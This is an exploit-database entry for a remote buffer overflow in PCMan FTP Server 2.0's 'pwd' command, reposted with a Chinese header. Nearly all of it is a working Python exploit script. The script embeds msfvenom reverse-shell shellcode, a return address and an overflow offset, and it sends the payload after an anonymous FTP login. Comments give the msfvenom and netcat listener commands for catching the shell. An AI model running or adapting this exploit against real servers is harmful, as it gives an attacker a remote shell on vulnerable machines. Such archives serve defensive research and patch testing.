PCMan FTP Server 2.0 – ‘pwd’ Remote Buffer Overflow

  • 作者: Waqas Ahmed Faroouqi
    日期: 2024-02-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51767/
  • # Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow
    # Date: 09/25/2023
    # Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
    # Vendor Homepage: http://pcman.openfoundry.org/
    # Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
    # Version: 2.0
    # Tested on: Windows XP SP3
    
    #!/usr/bin/python
    
    import socket
    
    #buffer = 'A' * 2500
    #offset = 2007
    #badchars=\x00\x0a\x0d
    #return_address=0x7e429353 (USER32.dll)
    #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d"
    #nc -nvlp 4444
    
    overflow = (
    "\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9"
    "\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d"
    "\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f"
    "\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53"
    "\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55"
    "\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1"
    "\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52"
    "\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6"
    "\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37"
    "\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf"
    "\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3"
    "\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4"
    "\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75"
    "\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7"
    "\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e"
    "\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17"
    "\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98" 
    "\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a" 
    "\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15" 
    "\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28" 
    "\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb" 
    "\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8" 
    "\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8" 
    "\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd"
    "\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94"
    "\xd7")
    
    shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow
    
    # Change IP/Port as required
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    try:
    print "\nSending evil buffer..."
    s.connect(('192.168.146.135',21))
    data = s.recv(1024)
    s.send('USER anonymous' +'\r\n')
    data = s.recv(1024)
    s.send('PASS anonymous\r\n')
    s.send('pwd ' + shellcode + '\r\n')
    s.close()
    print "\nExploit completed successfully!."
    except:
    print "Could not connect to FTP!"